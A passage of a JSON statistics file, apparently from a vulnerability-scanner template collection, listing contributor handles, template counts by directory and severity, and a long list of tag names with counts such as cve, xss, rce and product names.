withsecure","count":1},{"name":"2rs3c","count":1},{"name":"tehtbl","count":1},{"name":"brianlam38","count":1},{"name":"barthy.koeln","count":1},{"name":"couskito","count":1},{"name":"dawid-czarnecki","count":1},{"name":"tim_koopmans","count":1},{"name":"yaser_s","count":1},{"name":"m0ck3d","count":1},{"name":"adrianmf","count":1},{"name":"eremit4","count":1},{"name":"j33n1k4","count":1},{"name":"pdp","count":1},{"name":"mhdsamx","count":1},{"name":"jeya.seelan","count":1},{"name":"kchason","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"liquidsec","count":1},{"name":"sicksec","count":1},{"name":"spac3wh1te","count":1},{"name":"fopina","count":1},{"name":"high","count":1},{"name":"anonymous","count":1},{"name":"daviey","count":1},{"name":"rubina119","count":1},{"name":"pussycat0","count":1},{"name":"shivampand3y","count":1},{"name":"naglis","count":1},{"name":"xcapri","count":1},{"name":"godfatherorwa","count":1},{"name":"bernardo rodrigues @bernardofsr","count":1},{"name":"lixts","count":1},{"name":"professorabhay","count":1},{"name":"danfaizer","count":1},{"name":"chesterblue","count":1},{"name":"makyotox","count":1},{"name":"adamparsons","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"harryha","count":1},{"name":"borna nematzadeh","count":1},{"name":"0xcharan","count":1},{"name":"vulnspace","count":1},{"name":"ynnirc","count":1},{"name":"anon-artist","count":1},{"name":"dmartyn","count":1},{"name":"sec_hawk","count":1},{"name":"bjxsec","count":1},{"name":"unblvr1","count":1},{"name":"technicaljunkie","count":1},{"name":"numan türle","count":1},{"name":"am0nt31r0","count":1},{"name":"dhiyanesdk","count":1},{"name":"mbmy","count":1},{"name":"michael wedl","count":1},{"name":"yashgoti","count":1},{"name":"gonski","count":1},{"name":"prettyboyaaditya","count":1},{"name":"remi gascou (podalirius)","count":1},{"name":"iampritam","count":1},{"name":"calumjelrick","count":1},{"name":"0xprial","count":1},{"name":"cravaterouge","count":1},{"name":"b0yd","count":1},{"name":"marcio mendes","count":1},{"name":"gboddin","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"mayank_pandey01","count":1},{"name":"youngpope","count":1},{"name":"watchtowr","count":1},{"name":"co0nan","count":1},{"name":"0xh7ml","count":1},{"name":"samuelsamuelsamuel","count":1},{"name":"alexrydzak","count":1},{"name":"mrcl0wnlab","count":1},{"name":"shreyapohekar","count":1},{"name":"thelicato","count":1},{"name":"ptonewreckin","count":1},{"name":"jub0bs","count":1},{"name":"ohlinge","count":1},{"name":"notwhy","count":1},{"name":"ruppde","count":1},{"name":"h4sh5","count":1},{"name":"erikowen","count":1},{"name":"exceed","count":1},{"name":"adnanekhan","count":1},{"name":"zandros0","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"zsusac","count":1},{"name":"vinit989","count":1},{"name":"ledoubletake","count":1},{"name":"secthebit","count":1},{"name":"juliosmelo","count":1},{"name":"clment cruchet","count":1},{"name":"narluin","count":1},{"name":"ipanda","count":1},{"name":"omranisecurity","count":1},{"name":"mantissts","count":1},{"name":"yavolo","count":1},{"name":"rojanrijal","count":1},{"name":"ldionmarcil","count":1},{"name":"philippdelteil","count":1},{"name":"pry0cc","count":1},{"name":"joaonevess","count":1},{"name":"b0rn2r00t","count":1},{"name":"realexp3rt","count":1},{"name":"mohammad reza omrani | @omranisecurity","count":1},{"name":"pudsec","count":1},{"name":"httpvoid","count":1},{"name":"ok_bye_now","count":1},{"name":"ahmetpergamum","count":1},{"name":"manuelbua","count":1},{"name":"bughuntersurya","count":1},{"name":"justmumu","count":1},{"name":"knassar702","count":1},{"name":"xshuden","count":1},{"name":"th3.d1p4k","count":1},{"name":"metascan","count":1},{"name":"nerrorsec","count":1},{"name":"phyr3wall","count":1},{"name":"f0xy","count":1},{"name":"win3zz","count":1},{"name":"kabirsuda","count":1},{"name":"remonsec","count":1},{"name":"dale clarke","count":1},{"name":"rinolock","count":1},{"name":"udyz","count":1},{"name":"jbertman","count":1},{"name":"allenwest24","count":1},{"name":"affix","count":1},{"name":"pepitoh","count":1},{"name":"manasmbellani","count":1},{"name":"invisiblethreat","count":1},{"name":"omarkurt","count":1},{"name":"chron0x","count":1},{"name":"_darrenmartyn","count":1},{"name":"kareemse1im","count":1},{"name":"un-fmunozs","count":1},{"name":"mariam tariq","count":1},{"name":"jacalynli","count":1},{"name":"byobin","count":1},{"name":"jna1","count":1},{"name":"hakimkt","count":1},{"name":"ph33rr","count":1},{"name":"jiheon-dev","count":1},{"name":"nuts7","count":1},{"name":"shiva (strobes security)","count":1},{"name":"noobexploiter","count":1},{"name":"patrick pirker","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"th3r4id","count":1},{"name":"zn9988","count":1},{"name":"pascalheidmann","count":1},{"name":"lamscun","count":1},{"name":"ramkrishna sawant","count":1}],"directory":[{"name":"http","count":7477},{"name":"file","count":337},{"name":"workflows","count":191},{"name":"network","count":135},{"name":"cloud","count":98},{"name":"code","count":81},{"name":"javascript","count":57},{"name":"ssl","count":29},{"name":"dns","count":22},{"name":"dast","count":21},{"name":"headless","count":11},{"name":"cves.json","count":1},{"name":"contributors.json","count":1},{"name":"TEMPLATES-STATS.json","count":1}],"severity":[{"name":"info","count":3683},{"name":"high","count":1728},{"name":"medium","count":1520},{"name":"critical","count":1035},{"name":"low","count":263},{"name":"unknown","count":39}],"types":[{"name":"file","count":337},{"name":"dns","count":25}]} +{"tags":[{"name":"cve","count":2511},{"name":"panel","count":1157},{"name":"wordpress","count":983},{"name":"exposure","count":948},{"name":"xss","count":911},{"name":"wp-plugin","count":852},{"name":"osint","count":804},{"name":"tech","count":686},{"name":"lfi","count":662},{"name":"misconfig","count":659},{"name":"rce","count":600},{"name":"edb","count":599},{"name":"packetstorm","count":544},{"name":"wpscan","count":502},{"name":"cve2021","count":491},{"name":"cve2022","count":479},{"name":"wp","count":426},{"name":"cve2023","count":380},{"name":"unauth","count":367},{"name":"sqli","count":364},{"name":"file","count":346},{"name":"authenticated","count":343},{"name":"intrusive","count":302},{"name":"detect","count":295},{"name":"login","count":284},{"name":"kev","count":275},{"name":"cve2020","count":257},{"name":"token-spray","count":243},{"name":"oast","count":222},{"name":"config","count":221},{"name":"default-login","count":216},{"name":"top-200","count":215},{"name":"osint-social","count":210},{"name":"network","count":195},{"name":"token","count":193},{"name":"","count":191},{"name":"apache","count":191},{"name":"devops","count":177},{"name":"cve2018","count":170},{"name":"iot","count":167},{"name":"cve2019","count":164},{"name":"keys","count":156},{"name":"joomla","count":148},{"name":"install","count":147},{"name":"malware","count":142},{"name":"tcp","count":136},{"name":"redirect","count":135},{"name":"aws","count":134},{"name":"cloud","count":134},{"name":"auth-bypass","count":133},{"name":"ssrf","count":119},{"name":"phishing","count":117},{"name":"amazon","count":117},{"name":"files","count":113},{"name":"cms","count":113},{"name":"cve2010","count":112},{"name":"cve2017","count":110},{"name":"router","count":108},{"name":"top-100","count":100},{"name":"aws-cloud-config","count":90},{"name":"disclosure","count":89},{"name":"linux","count":85},{"name":"code","count":81},{"name":"cve2024","count":81},{"name":"local","count":80},{"name":"privesc","count":79},{"name":"takeover","count":79},{"name":"seclists","count":79},{"name":"tokens","count":78},{"name":"fileupload","count":76},{"name":"oracle","count":73},{"name":"oss","count":68},{"name":"js","count":67},{"name":"cisco","count":67},{"name":"enum","count":65},{"name":"adobe","count":63},{"name":"ir","count":61},{"name":"huntr","count":60},{"name":"cve2015","count":59},{"name":"atlassian","count":59},{"name":"cve2016","count":57},{"name":"vmware","count":56},{"name":"detection","count":56},{"name":"google","count":56},{"name":"c2","count":55},{"name":"logs","count":48},{"name":"tenable","count":48},{"name":"log4j","count":47},{"name":"hackerone","count":46},{"name":"vulhub","count":46},{"name":"osint-gaming","count":45},{"name":"php","count":45},{"name":"aem","count":45},{"name":"cve2014","count":44},{"name":"debug","count":44},{"name":"jndi","count":44},{"name":"generic","count":43},{"name":"deserialization","count":43},{"name":"osint-porn","count":42},{"name":"plugin","count":42},{"name":"oa","count":42},{"name":"osint-hobby","count":42},{"name":"traversal","count":42},{"name":"microsoft","count":42},{"name":"cnvd","count":41},{"name":"springboot","count":41},{"name":"misc","count":40},{"name":"miscellaneous","count":38},{"name":"injection","count":38},{"name":"listing","count":37},{"name":"jira","count":37},{"name":"kubernetes","count":37},{"name":"cti","count":36},{"name":"ibm","count":36},{"name":"osint-misc","count":35},{"name":"sap","count":34},{"name":"fuzz","count":34},{"name":"ssl","count":33},{"name":"tls","count":32},{"name":"osint-tech","count":31},{"name":"osint-coding","count":30},{"name":"dlink","count":30},{"name":"ec2","count":30},{"name":"wp-theme","count":30},{"name":"api","count":28},{"name":"gitlab","count":28},{"name":"k8s","count":28},{"name":"fortinet","count":28},{"name":"dns","count":27},{"name":"citrix","count":27},{"name":"bestwebsoft","count":27},{"name":"proxy","count":27},{"name":"ssh","count":26},{"name":"cve2012","count":26},{"name":"firewall","count":26},{"name":"lfr","count":26},{"name":"zohocorp","count":26},{"name":"weaver","count":25},{"name":"manageengine","count":25},{"name":"zoho","count":24},{"name":"osint-shopping","count":24},{"name":"osint-finance","count":24},{"name":"admin","count":24},{"name":"osint-images","count":24},{"name":"osint-business","count":24},{"name":"file-upload","count":23},{"name":"audit","count":23},{"name":"xxe","count":23},{"name":"stored-xss","count":23},{"name":"tomcat","count":23},{"name":"yonyou","count":23},{"name":"prestashop","count":22},{"name":"s3","count":22},{"name":"github","count":22},{"name":"cicd","count":22},{"name":"msf","count":21},{"name":"weblogic","count":21},{"name":"dast","count":21},{"name":"ecology","count":21},{"name":"printer","count":21},{"name":"jenkins","count":20},{"name":"camera","count":20},{"name":"ftp","count":20},{"name":"confluence","count":19},{"name":"hp","count":19},{"name":"struts","count":19},{"name":"rukovoditel","count":19},{"name":"grafana","count":19},{"name":"wavlink","count":19},{"name":"cve2011","count":18},{"name":"android","count":18},{"name":"osint-music","count":18},{"name":"coldfusion","count":18},{"name":"ruijie","count":18},{"name":"node.js","count":18},{"name":"vpn","count":18},{"name":"mail","count":17},{"name":"honeypot","count":17},{"name":"nginx","count":17},{"name":"microweber","count":17},{"name":"azure","count":17},{"name":"headless","count":17},{"name":"magento","count":16},{"name":"alibaba","count":16},{"name":"rconfig","count":16},{"name":"osint-blog","count":16},{"name":"backup","count":16},{"name":"service","count":16},{"name":"jarm","count":16},{"name":"status","count":16},{"name":"cve2009","count":16},{"name":"backdoor","count":16},{"name":"ssti","count":15},{"name":"nagios","count":15},{"name":"zyxel","count":15},{"name":"ruby","count":15},{"name":"setup","count":15},{"name":"moosocial","count":15},{"name":"seeyon","count":15},{"name":"cve2008","count":15},{"name":"cnvd2021","count":15},{"name":"woocommerce","count":15},{"name":"java","count":15},{"name":"installer","count":15},{"name":"tongda","count":15},{"name":"netgear","count":15},{"name":"cve2013","count":15},{"name":"redhat","count":15},{"name":"nodejs","count":15},{"name":"bypass","count":15},{"name":"dashboard","count":15},{"name":"osint-art","count":14},{"name":"docker","count":14},{"name":"jboss","count":14},{"name":"domainmod","count":14},{"name":"npm","count":14},{"name":"redis","count":14},{"name":"info-leak","count":14},{"name":"rds","count":14},{"name":"creds-stuffing","count":14},{"name":"auth","count":14},{"name":"dell","count":14},{"name":"osint-health","count":14},{"name":"node","count":14},{"name":"smtp","count":14},{"name":"login-check","count":14},{"name":"ivanti","count":14},{"name":"icewarp","count":14},{"name":"git","count":14},{"name":"osint-political","count":13},{"name":"fuzzing","count":13},{"name":"rails","count":13},{"name":"airflow","count":13},{"name":"fortigate","count":13},{"name":"cuppacms","count":13},{"name":"hashicorp","count":13},{"name":"postgresql","count":13},{"name":"laravel","count":13},{"name":"cuppa","count":13},{"name":"mysql","count":13},{"name":"windows","count":13},{"name":"osint-dating","count":13},{"name":"graphql","count":13},{"name":"sonicwall","count":13},{"name":"abstractapi","count":13},{"name":"ofbiz","count":12},{"name":"doppler","count":12},{"name":"smb","count":12},{"name":"drupal","count":12},{"name":"netsweeper","count":12},{"name":"webserver","count":12},{"name":"newrelic","count":12},{"name":"phpgurukul","count":12},{"name":"jetbrains","count":12},{"name":"vbulletin","count":12},{"name":"zimbra","count":12},{"name":"kafka","count":12},{"name":"django","count":11},{"name":"fastjson","count":11},{"name":"osint-video","count":11},{"name":"online-fire-reporting","count":11},{"name":"spring","count":11},{"name":"glpi","count":11},{"name":"prometheus","count":11},{"name":"cache","count":11},{"name":"online_fire_reporting_system_project","count":11},{"name":"xstream","count":11},{"name":"hikvision","count":11},{"name":"iam","count":11},{"name":"dedecms","count":11},{"name":"iis","count":11},{"name":"phpmyadmin","count":11},{"name":"jolokia","count":11},{"name":"sitecore","count":10},{"name":"solarview","count":10},{"name":"crlf","count":10},{"name":"xstream_project","count":10},{"name":"symfony","count":10},{"name":"solr","count":10},{"name":"dropbox","count":10},{"name":"elasticsearch","count":10},{"name":"progress","count":10},{"name":"zabbix","count":10},{"name":"samsung","count":10},{"name":"thinkphp","count":10},{"name":"db","count":10},{"name":"dahua","count":10},{"name":"digitalocean","count":10},{"name":"secret","count":9},{"name":"moodle","count":9},{"name":"joomla\\!","count":9},{"name":"firebase","count":9},{"name":"gitea","count":9},{"name":"wso2","count":9},{"name":"python","count":9},{"name":"exchange","count":9},{"name":"elastic","count":9},{"name":"lucee","count":9},{"name":"sophos","count":9},{"name":"artica","count":9},{"name":"scada","count":9},{"name":"bitbucket","count":9},{"name":"vcenter","count":9},{"name":"blind","count":9},{"name":"versa","count":9},{"name":"f5","count":9},{"name":"cnvd2020","count":9},{"name":"sangfor","count":9},{"name":"pfsense","count":9},{"name":"console","count":9},{"name":"opencats","count":9},{"name":"kube","count":9},{"name":"druid","count":9},{"name":"facebook","count":9},{"name":"cloudtrail","count":9},{"name":"gateway","count":9},{"name":"mirai","count":8},{"name":"phpinfo","count":8},{"name":"nagiosxi","count":8},{"name":"unauthenticated","count":8},{"name":"microfocus","count":8},{"name":"lfprojects","count":8},{"name":"spotweb_project","count":8},{"name":"go","count":8},{"name":"instrusive","count":8},{"name":"e-office","count":8},{"name":"phpjabbers","count":8},{"name":"emerge","count":8},{"name":"metadata","count":8},{"name":"bucket","count":8},{"name":"spotweb","count":8},{"name":"default-page","count":8},{"name":"cisco-switch","count":8},{"name":"odoo","count":8},{"name":"manager","count":8},{"name":"symantec","count":8},{"name":"huawei","count":8},{"name":"ognl","count":8},{"name":"wanhu","count":8},{"name":"discord","count":8},{"name":"openemr","count":8},{"name":"config-audit","count":8},{"name":"hms","count":8},{"name":"error","count":8},{"name":"oauth","count":8},{"name":"cloud-enum","count":8},{"name":"atom","count":8},{"name":"nexus","count":8},{"name":"recon","count":8},{"name":"exploitdb","count":8},{"name":"mlflow","count":8},{"name":"osint-news","count":8},{"name":"telesquare","count":7},{"name":"pmb","count":7},{"name":"teamcity","count":7},{"name":"solarwinds","count":7},{"name":"avtech","count":7},{"name":"filemanager","count":7},{"name":"bloofox","count":7},{"name":"oos","count":7},{"name":"websphere","count":7},{"name":"twitter","count":7},{"name":"landray","count":7},{"name":"linkedin","count":7},{"name":"mongodb","count":7},{"name":"nortekcontrol","count":7},{"name":"vpc","count":7},{"name":"slack","count":7},{"name":"nacos","count":7},{"name":"keking","count":7},{"name":"database","count":7},{"name":"monstra","count":7},{"name":"fpd","count":7},{"name":"mobileiron","count":7},{"name":"rfi","count":7},{"name":"fortios","count":7},{"name":"vrealize","count":7},{"name":"ruckus","count":7},{"name":"shopify","count":7},{"name":"contec","count":7},{"name":"maps","count":7},{"name":"gogs","count":7},{"name":"squirrelmail","count":7},{"name":"cacti","count":7},{"name":"moodating","count":7},{"name":"activemq","count":7},{"name":"car_rental_management_system_project","count":7},{"name":"opensis","count":7},{"name":"blockchain","count":7},{"name":"vms","count":7},{"name":"bigip","count":7},{"name":"tikiwiki","count":6},{"name":"express","count":6},{"name":"microstrategy","count":6},{"name":"doctor-appointment-system","count":6},{"name":"doctor_appointment_system_project","count":6},{"name":"sql","count":6},{"name":"server","count":6},{"name":"couchdb","count":6},{"name":"bmc","count":6},{"name":"leak","count":6},{"name":"paloaltonetworks","count":6},{"name":"jeecg","count":6},{"name":"geoserver","count":6},{"name":"splunk","count":6},{"name":"advantech","count":6},{"name":"openvpn","count":6},{"name":"gcp","count":6},{"name":"webmin","count":6},{"name":"zhiyuan","count":6},{"name":"elfinder","count":6},{"name":"asus","count":6},{"name":"beyondtrust","count":6},{"name":"jamf","count":6},{"name":"ldap","count":6},{"name":"flutterwave","count":6},{"name":"paypal","count":6},{"name":"minio","count":6},{"name":"keycloak","count":6},{"name":"magmi","count":6},{"name":"rat","count":6},{"name":"synacor","count":6},{"name":"74cms","count":6},{"name":"typo3","count":6},{"name":"plesk","count":6},{"name":"chanjet","count":6},{"name":"liferay","count":6},{"name":"asp","count":6},{"name":"cobbler","count":6},{"name":"log","count":6},{"name":"jetty","count":6},{"name":"cockpit","count":6},{"name":"servicenow","count":6},{"name":"sonarqube","count":6},{"name":"kubelet","count":6},{"name":"caucho","count":5},{"name":"qnap","count":5},{"name":"tibco","count":5},{"name":"10web","count":5},{"name":"openstack","count":5},{"name":"cve2007","count":5},{"name":"fatpipe","count":5},{"name":"schneider-electric","count":5},{"name":"ethereum","count":5},{"name":"gocd","count":5},{"name":"mssql","count":5},{"name":"awstats","count":5},{"name":"thedigitalcraft","count":5},{"name":"telerik","count":5},{"name":"elementor","count":5},{"name":"decision-center","count":5},{"name":"avideo","count":5},{"name":"graylog","count":5},{"name":"adb","count":5},{"name":"terramaster","count":5},{"name":"cnvd2023","count":5},{"name":"zzzcms","count":5},{"name":"storage","count":5},{"name":"webkul","count":5},{"name":"redmine","count":5},{"name":"web3","count":5},{"name":"xmlrpc","count":5},{"name":"sysaid","count":5},{"name":"pyload","count":5},{"name":"percha","count":5},{"name":"carrental","count":5},{"name":"cdata","count":5},{"name":"matrix","count":5},{"name":"magmi_project","count":5},{"name":"jabber","count":5},{"name":"agentejo","count":5},{"name":"checkpoint","count":5},{"name":"circarlife","count":5},{"name":"acm","count":5},{"name":"jupyter","count":5},{"name":"froxlor","count":5},{"name":"gnu","count":5},{"name":"glpi-project","count":5},{"name":"nuuo","count":5},{"name":"circontrol","count":5},{"name":"connectwise","count":5},{"name":"tenda","count":5},{"name":"adminer","count":5},{"name":"sftp","count":5},{"name":"akamai","count":5},{"name":"vehicle_service_management_system_project","count":5},{"name":"strapi","count":5},{"name":"kkfileview","count":5},{"name":"parallels","count":5},{"name":"sentry","count":5},{"name":"apisix","count":5},{"name":"axigen","count":5},{"name":"wpdevart","count":5},{"name":"open-emr","count":5},{"name":"digitaldruid","count":5},{"name":"webview","count":5},{"name":"mikrotik","count":5},{"name":"ems","count":5},{"name":"openfire","count":5},{"name":"hpe","count":5},{"name":"cloudflare","count":5},{"name":"react","count":5},{"name":"firmware","count":5},{"name":"square","count":5},{"name":"spark","count":5},{"name":"swagger","count":5},{"name":"qdpm","count":5},{"name":"hoteldruid","count":5},{"name":"genetechsolutions","count":5},{"name":"voip","count":5},{"name":"craftcms","count":5},{"name":"jwt","count":5},{"name":"resin","count":5},{"name":"metinfo","count":5},{"name":"papercut","count":5},{"name":"wbce","count":5},{"name":"rseenet","count":5},{"name":"crushftp","count":5},{"name":"totolink","count":5},{"name":"chamilo","count":5},{"name":"dionaea","count":5},{"name":"asana","count":5},{"name":"avaya","count":5},{"name":"hybris","count":5},{"name":"openai","count":5},{"name":"goanywhere","count":5},{"name":"pie-register","count":4},{"name":"env","count":4},{"name":"thinkcmf","count":4},{"name":"creativeitem","count":4},{"name":"codeigniter","count":4},{"name":"wcs","count":4},{"name":"concrete","count":4},{"name":"datadog","count":4},{"name":"auieo","count":4},{"name":"confluent","count":4},{"name":"candidats","count":4},{"name":"mostracms","count":4},{"name":"photo","count":4},{"name":"postmessage","count":4},{"name":"http","count":4},{"name":"hongfan","count":4},{"name":"newstatpress","count":4},{"name":"globalprotect","count":4},{"name":"opencms","count":4},{"name":"intelbras","count":4},{"name":"heroku","count":4},{"name":"wireguard","count":4},{"name":"os4ed","count":4},{"name":"rubyonrails","count":4},{"name":"mitel","count":4},{"name":"kevinlab","count":4},{"name":"prtg","count":4},{"name":"dolibarr","count":4},{"name":"flink","count":4},{"name":"metasploit","count":4},{"name":"learnpress","count":4},{"name":"pega","count":4},{"name":"centos","count":4},{"name":"pixie","count":4},{"name":"jfrog","count":4},{"name":"dahuasecurity","count":4},{"name":"flatpress","count":4},{"name":"zend","count":4},{"name":"angular","count":4},{"name":"linkerd","count":4},{"name":"aria","count":4},{"name":"mailchimp","count":4},{"name":"panabit","count":4},{"name":"jellyfin","count":4},{"name":"easypost","count":4},{"name":"phpjabber","count":4},{"name":"sugarcrm","count":4},{"name":"artifactory","count":4},{"name":"osgeo","count":4},{"name":"hongdian","count":4},{"name":"search","count":4},{"name":"esri","count":4},{"name":"flickr","count":4},{"name":"aspose","count":4},{"name":"grav","count":4},{"name":"pip","count":4},{"name":"linksys","count":4},{"name":"wp-statistics","count":4},{"name":"ampache","count":4},{"name":"shiro","count":4},{"name":"stripe","count":4},{"name":"djangoproject","count":4},{"name":"httpd","count":4},{"name":"h3c","count":4},{"name":"salesforce","count":4},{"name":"tiki","count":4},{"name":"webmail","count":4},{"name":"metersphere","count":4},{"name":"terra-master","count":4},{"name":"nextjs","count":4},{"name":"articatech","count":4},{"name":"mcafee","count":4},{"name":"reprisesoftware","count":4},{"name":"juniper","count":4},{"name":"seagate","count":4},{"name":"ghost","count":4},{"name":"veronalabs","count":4},{"name":"churchcrm","count":4},{"name":"jsf","count":4},{"name":"thimpress","count":4},{"name":"osint-archived","count":4},{"name":"cnvd2022","count":4},{"name":"mooveagency","count":4},{"name":"nosqli","count":4},{"name":"httpserver","count":4},{"name":"fit2cloud","count":4},{"name":"eclipse","count":4},{"name":"proftpd","count":4},{"name":"umbraco","count":4},{"name":"springcloud","count":4},{"name":"owncloud","count":4},{"name":"mostra","count":4},{"name":"kentico","count":4},{"name":"kibana","count":4},{"name":"yeswiki","count":4},{"name":"consul","count":4},{"name":"audiocodes","count":4},{"name":"phppgadmin","count":4},{"name":"okta","count":4},{"name":"jorani","count":4},{"name":"kyocera","count":4},{"name":"myeventon","count":4},{"name":"bamboo","count":4},{"name":"mantisbt","count":4},{"name":"pentaho","count":4},{"name":"finicity","count":4},{"name":"metabase","count":4},{"name":"ternaria","count":4},{"name":"roxy","count":4},{"name":"pluginus","count":4},{"name":"info","count":4},{"name":"aura","count":4},{"name":"joomlamo","count":4},{"name":"arcgis","count":4},{"name":"moveit","count":4},{"name":"sound4","count":4},{"name":"royalevent","count":4},{"name":"bitrix","count":4},{"name":"hospital_management_system_project","count":4},{"name":"casaos","count":4},{"name":"powerjob","count":4},{"name":"imgproxy","count":4},{"name":"kingsoft","count":4},{"name":"age-encryption","count":4},{"name":"puppet","count":4},{"name":"panos","count":4},{"name":"linuxfoundation","count":4},{"name":"mautic","count":4},{"name":"cnvd2019","count":4},{"name":"newstatpress_project","count":4},{"name":"bittrex","count":4},{"name":"harbor","count":4},{"name":"harmistechnology","count":4},{"name":"sigb","count":4},{"name":"zte","count":4},{"name":"webshell","count":4},{"name":"sendgrid","count":4},{"name":"password","count":4},{"name":"cve2005","count":4},{"name":"supsystic","count":4},{"name":"dotnet","count":4},{"name":"pmb_project","count":4},{"name":"telegram","count":4},{"name":"igniterealtime","count":4},{"name":"horde","count":4},{"name":"d-link","count":4},{"name":"purchase_order_management_system_project","count":4},{"name":"ray","count":4},{"name":"ebs","count":4},{"name":"gnuboard","count":4},{"name":"rocketchat","count":4},{"name":"figma","count":4},{"name":"dom","count":4},{"name":"rabbitmq","count":4},{"name":"waf","count":3},{"name":"dos","count":3},{"name":"gvectors","count":3},{"name":"thruk","count":3},{"name":"vercel","count":3},{"name":"redash","count":3},{"name":"limesurvey","count":3},{"name":"mpsec","count":3},{"name":"xwiki","count":3},{"name":"sqlite","count":3},{"name":"draytek","count":3},{"name":"grp","count":3},{"name":"sonatype","count":3},{"name":"selenium","count":3},{"name":"digitalrebar","count":3},{"name":"geowebserver","count":3},{"name":"rancher","count":3},{"name":"actuator","count":3},{"name":"fastly","count":3},{"name":"javascript","count":3},{"name":"lansweeper","count":3},{"name":"std42","count":3},{"name":"poms","count":3},{"name":"kavita","count":3},{"name":"contentful","count":3},{"name":"xerox","count":3},{"name":"glassfish","count":3},{"name":"ueditor","count":3},{"name":"mailgun","count":3},{"name":"rubygems","count":3},{"name":"superset","count":3},{"name":"droneci","count":3},{"name":"epson","count":3},{"name":"pypi","count":3},{"name":"netfortris","count":3},{"name":"superadmin","count":3},{"name":"ruckuswireless","count":3},{"name":"telnet","count":3},{"name":"magnolia","count":3},{"name":"buffalo","count":3},{"name":"samba","count":3},{"name":"bash","count":3},{"name":"flutter","count":3},{"name":"boldgrid","count":3},{"name":"truenas","count":3},{"name":"school_dormitory_management_system_project","count":3},{"name":"projectsend","count":3},{"name":"xoops","count":3},{"name":"avada","count":3},{"name":"yii","count":3},{"name":"trendnet","count":3},{"name":"cpanel","count":3},{"name":"gibbon","count":3},{"name":"e-mobile","count":3},{"name":"influxdb","count":3},{"name":"ad","count":3},{"name":"chatgpt","count":3},{"name":"e-cology","count":3},{"name":"openam","count":3},{"name":"decision-server","count":3},{"name":"jeesns","count":3},{"name":"axis","count":3},{"name":"wwbn","count":3},{"name":"payara","count":3},{"name":"self-hosted","count":3},{"name":"xxljob","count":3},{"name":"pulsar","count":3},{"name":"dotnetnuke","count":3},{"name":"apollo","count":3},{"name":"adafruit","count":3},{"name":"sony","count":3},{"name":"clusterengine","count":3},{"name":"thefactory","count":3},{"name":"esafenet","count":3},{"name":"posh","count":3},{"name":"bigant","count":3},{"name":"wordfence","count":3},{"name":"emqx","count":3},{"name":"zendesk","count":3},{"name":"loytec","count":3},{"name":"fuelcms","count":3},{"name":"ixcache","count":3},{"name":"discourse","count":3},{"name":"automattic","count":3},{"name":"segment","count":3},{"name":"purchase-order-management-system","count":3},{"name":"complete_online_job_search_system_project","count":3},{"name":"netlify","count":3},{"name":"eyoucms","count":3},{"name":"rstudio","count":3},{"name":"cloudwatch","count":3},{"name":"tautulli","count":3},{"name":"mapbox","count":3},{"name":"contribsys","count":3},{"name":"woodwing","count":3},{"name":"axway","count":3},{"name":"webtareas_project","count":3},{"name":"structurizr","count":3},{"name":"netflix","count":3},{"name":"dzzoffice","count":3},{"name":"reddit","count":3},{"name":"lotus","count":3},{"name":"spip","count":3},{"name":"movable","count":3},{"name":"webalizer","count":3},{"name":"fileman","count":3},{"name":"processwire","count":3},{"name":"rpm","count":3},{"name":"idrac","count":3},{"name":"western_digital","count":3},{"name":"cybelesoft","count":3},{"name":"forgerock","count":3},{"name":"i3geo","count":3},{"name":"ithemes","count":3},{"name":"evlink","count":3},{"name":"csrf","count":3},{"name":"circleci","count":3},{"name":"sudo","count":3},{"name":"ninjaforms","count":3},{"name":"piwigo","count":3},{"name":"dev.pucit.edu.pk","count":3},{"name":"openbmcs","count":3},{"name":"sharepoint","count":3},{"name":"carel","count":3},{"name":"netdata","count":3},{"name":"lighttpd","count":3},{"name":"smuggling","count":3},{"name":"credential","count":3},{"name":"listserv","count":3},{"name":"siemens","count":3},{"name":"joomlacomponent.inetlanka","count":3},{"name":"sitemap","count":3},{"name":"osticket","count":3},{"name":"instagram","count":3},{"name":"yzmcms","count":3},{"name":"teampass","count":3},{"name":"newsletter","count":3},{"name":"qlik","count":3},{"name":"postman","count":3},{"name":"afterlogic","count":3},{"name":"axis2","count":3},{"name":"diagrams","count":3},{"name":"ampps","count":3},{"name":"shell","count":3},{"name":"eshop","count":3},{"name":"monitorr","count":3},{"name":"digital-watchdog","count":3},{"name":"h2o","count":3},{"name":"passive","count":3},{"name":"getsimple","count":3},{"name":"adiscon","count":3},{"name":"opencart","count":3},{"name":"weiphp","count":3},{"name":"openwrt","count":3},{"name":"wpdeveloper","count":3},{"name":"dvr","count":3},{"name":"aruba","count":3},{"name":"jitsi","count":3},{"name":"modoboa","count":3},{"name":"strangerstudios","count":3},{"name":"purchase-order","count":3},{"name":"empirecms","count":3},{"name":"dreambox","count":3},{"name":"r-seenet","count":3},{"name":"sidekiq","count":3},{"name":"casdoor","count":3},{"name":"selea","count":3},{"name":"academylms","count":3},{"name":"webtareas","count":3},{"name":"steve","count":3},{"name":"webadmin","count":3},{"name":"ansible","count":3},{"name":"gradle","count":3},{"name":"backdropcms","count":3},{"name":"kfm","count":3},{"name":"inspur","count":3},{"name":"cgi","count":3},{"name":"cas","count":3},{"name":"flexvnf","count":3},{"name":"drawio","count":3},{"name":"backdrop","count":3},{"name":"etcd","count":3},{"name":"graph","count":3},{"name":"airtable","count":3},{"name":"labkey","count":3},{"name":"messaging","count":3},{"name":"bitrix24","count":3},{"name":"intercom","count":3},{"name":"tplus","count":3},{"name":"webkul-qloapps","count":3},{"name":"soplanning","count":3},{"name":"apple","count":3},{"name":"targa","count":3},{"name":"favicon","count":3},{"name":"octoprint","count":3},{"name":"unifi","count":3},{"name":"nortek","count":3},{"name":"phpipam","count":3},{"name":"qts","count":3},{"name":"subrion","count":3},{"name":"dotcms","count":3},{"name":"httpbin","count":3},{"name":"pandorafms","count":3},{"name":"monitor","count":3},{"name":"modem","count":3},{"name":"electron","count":3},{"name":"fanruan","count":3},{"name":"switch","count":3},{"name":"zeroshell","count":3},{"name":"dokuwiki","count":3},{"name":"webnus","count":3},{"name":"nuget","count":3},{"name":"etsy","count":3},{"name":"petya","count":3},{"name":"thinfinity","count":3},{"name":"cluster","count":3},{"name":"hsphere","count":3},{"name":"webcam","count":3},{"name":"covenant","count":3},{"name":"saltstack","count":3},{"name":"rlm","count":3},{"name":"3cx","count":3},{"name":"watchguard","count":3},{"name":"voipmonitor","count":3},{"name":"learndash","count":3},{"name":"n